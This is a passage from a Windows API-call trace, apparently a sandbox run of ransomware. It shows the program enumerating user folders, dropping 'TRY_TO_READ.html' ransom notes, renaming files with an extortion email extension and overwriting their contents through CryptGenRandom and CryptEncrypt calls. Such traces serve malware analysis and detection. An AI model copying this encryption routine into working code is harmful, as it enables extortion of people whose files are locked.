ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0161.093] FindNextFileW (in: hFindFile=0x35e3d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9785c830, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x9785c830, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9785c830, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0161.093] FindNextFileW (in: hFindFile=0x35e3d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9785c830, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x9785c830, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9785c830, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0161.094] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.094] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.094] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk", dwFileAttributes=0x80) returned 1 [0161.095] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk") returned 53 [0161.095] GetProcessHeap () returned 0x2e0000 [0161.095] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd0) returned 0x3470a0 [0161.095] lstrcpyW (in: lpString1=0x3470a0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" [0161.095] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk.12781717671972518758.ex_parvis@aol.com.AIR" [0161.095] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.097] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4bc [0161.097] GetProcessHeap () returned 0x2e0000 [0161.097] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3470a0 | out: hHeap=0x2e0000) returned 1 [0161.097] GetFileSizeEx (in: hFile=0x4bc, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=363) returned 1 [0161.097] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x16b [0161.097] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.097] GetProcessHeap () returned 0x2e0000 [0161.097] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.097] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.097] WriteFile (in: hFile=0x4bc, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.098] WriteFile (in: hFile=0x4bc, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.098] WriteFile (in: hFile=0x4bc, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.099] ReadFile (in: hFile=0x4bc, lpBuffer=0x30a498, nNumberOfBytesToRead=0x16b, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30a498*, lpNumberOfBytesRead=0x2acf9c8*=0x16b, lpOverlapped=0x0) returned 1 [0161.099] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=-363, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.099] WriteFile (in: hFile=0x4bc, lpBuffer=0x319788*, nNumberOfBytesToWrite=0x16b, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x319788*, lpNumberOfBytesWritten=0x2acf9c8*=0x16b, lpOverlapped=0x0) returned 1 [0161.099] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.099] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.099] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk", dwFileAttributes=0x80) returned 1 [0161.100] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk") returned 50 [0161.100] GetProcessHeap () returned 0x2e0000 [0161.100] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xca) returned 0x3470a0 [0161.100] lstrcpyW (in: lpString1=0x3470a0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" [0161.100] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk.12781717671972518758.ex_parvis@aol.com.AIR" [0161.100] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.102] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4bc [0161.102] GetProcessHeap () returned 0x2e0000 [0161.102] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3470a0 | out: hHeap=0x2e0000) returned 1 [0161.102] GetFileSizeEx (in: hFile=0x4bc, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=929) returned 1 [0161.102] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x3a1 [0161.102] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.102] GetProcessHeap () returned 0x2e0000 [0161.102] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.103] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.103] WriteFile (in: hFile=0x4bc, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.104] WriteFile (in: hFile=0x4bc, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.104] WriteFile (in: hFile=0x4bc, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.105] ReadFile (in: hFile=0x4bc, lpBuffer=0x31d01e0, nNumberOfBytesToRead=0x3a1, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d01e0*, lpNumberOfBytesRead=0x2acf9c8*=0x3a1, lpOverlapped=0x0) returned 1 [0161.105] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=-929, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.105] WriteFile (in: hFile=0x4bc, lpBuffer=0x31d0590*, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d0590*, lpNumberOfBytesWritten=0x2acf9c8*=0x3a1, lpOverlapped=0x0) returned 1 [0161.105] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.105] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.105] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk", dwFileAttributes=0x80) returned 1 [0161.105] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk") returned 48 [0161.105] GetProcessHeap () returned 0x2e0000 [0161.105] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc6) returned 0x319d30 [0161.105] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" [0161.105] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk.12781717671972518758.ex_parvis@aol.com.AIR" [0161.105] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.108] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4bc [0161.108] GetProcessHeap () returned 0x2e0000 [0161.108] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0161.108] GetFileSizeEx (in: hFile=0x4bc, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=486) returned 1 [0161.108] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x1e6 [0161.108] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.108] GetProcessHeap () returned 0x2e0000 [0161.108] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.108] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.108] WriteFile (in: hFile=0x4bc, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.109] WriteFile (in: hFile=0x4bc, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.109] WriteFile (in: hFile=0x4bc, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.109] ReadFile (in: hFile=0x4bc, lpBuffer=0x32f868, nNumberOfBytesToRead=0x1e6, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x32f868*, lpNumberOfBytesRead=0x2acf9c8*=0x1e6, lpOverlapped=0x0) returned 1 [0161.110] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=-486, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.110] WriteFile (in: hFile=0x4bc, lpBuffer=0x31d01e0*, nNumberOfBytesToWrite=0x1e6, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d01e0*, lpNumberOfBytesWritten=0x2acf9c8*=0x1e6, lpOverlapped=0x0) returned 1 [0161.110] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.110] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.110] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini", dwFileAttributes=0x80) returned 1 [0161.110] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini") returned 48 [0161.110] GetProcessHeap () returned 0x2e0000 [0161.110] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc6) returned 0x319d30 [0161.110] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini" [0161.110] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" [0161.110] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.113] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4bc [0161.113] GetProcessHeap () returned 0x2e0000 [0161.113] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0161.113] GetFileSizeEx (in: hFile=0x4bc, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=580) returned 1 [0161.113] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x244 [0161.113] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.113] GetProcessHeap () returned 0x2e0000 [0161.114] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.114] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.114] WriteFile (in: hFile=0x4bc, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.114] WriteFile (in: hFile=0x4bc, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.115] WriteFile (in: hFile=0x4bc, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.115] ReadFile (in: hFile=0x4bc, lpBuffer=0x31d01e0, nNumberOfBytesToRead=0x244, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d01e0*, lpNumberOfBytesRead=0x2acf9c8*=0x244, lpOverlapped=0x0) returned 1 [0161.115] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=-580, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.115] WriteFile (in: hFile=0x4bc, lpBuffer=0x31d0430*, nNumberOfBytesToWrite=0x244, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d0430*, lpNumberOfBytesWritten=0x2acf9c8*=0x244, lpOverlapped=0x0) returned 1 [0161.115] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9785c830, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9785c830, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35e418 [0161.115] FindNextFileW (in: hFindFile=0x35e418, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9785c830, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9785c830, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.115] FindNextFileW (in: hFindFile=0x35e418, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5b2f160, ftCreationTime.dwHighDateTime=0x1d4d4a8, ftLastAccessTime.dwLowDateTime=0x1b9fa080, ftLastAccessTime.dwHighDateTime=0x1d4c8bc, ftLastWriteTime.dwLowDateTime=0x1b9fa080, ftLastWriteTime.dwHighDateTime=0x1d4c8bc, nFileSizeHigh=0x0, nFileSizeLow=0xd52e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5pxFnVjLi.m4a", cAlternateFileName="5PXFNV~1.M4A")) returned 1 [0161.115] FindNextFileW (in: hFindFile=0x35e418, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0161.115] FindNextFileW (in: hFindFile=0x35e418, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cb50e90, ftCreationTime.dwHighDateTime=0x1d4cf53, ftLastAccessTime.dwLowDateTime=0x7b7d0ee0, ftLastAccessTime.dwHighDateTime=0x1d4d58f, ftLastWriteTime.dwLowDateTime=0x7b7d0ee0, ftLastWriteTime.dwHighDateTime=0x1d4d58f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="g-s_rdMf6KkV", cAlternateFileName="G-S_RD~1")) returned 1 [0161.115] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g-s_rdmf6kkv\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c0 [0161.117] FindNextFileW (in: hFindFile=0x35e418, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9785c830, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x9785c830, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb149ca50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0161.117] FindNextFileW (in: hFindFile=0x35e418, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b6a3320, ftCreationTime.dwHighDateTime=0x1d4d41c, ftLastAccessTime.dwLowDateTime=0xbcd8c690, ftLastAccessTime.dwHighDateTime=0x1d4c9af, ftLastWriteTime.dwLowDateTime=0xbcd8c690, ftLastWriteTime.dwHighDateTime=0x1d4c9af, nFileSizeHigh=0x0, nFileSizeLow=0x175e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Wu _xooavyqXqclq.wav", cAlternateFileName="WU_XOO~1.WAV")) returned 1 [0161.117] FindNextFileW (in: hFindFile=0x35e418, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b6a3320, ftCreationTime.dwHighDateTime=0x1d4d41c, ftLastAccessTime.dwLowDateTime=0xbcd8c690, ftLastAccessTime.dwHighDateTime=0x1d4c9af, ftLastWriteTime.dwLowDateTime=0xbcd8c690, ftLastWriteTime.dwHighDateTime=0x1d4c9af, nFileSizeHigh=0x0, nFileSizeLow=0x175e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Wu _xooavyqXqclq.wav", cAlternateFileName="WU_XOO~1.WAV")) returned 0 [0161.117] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, 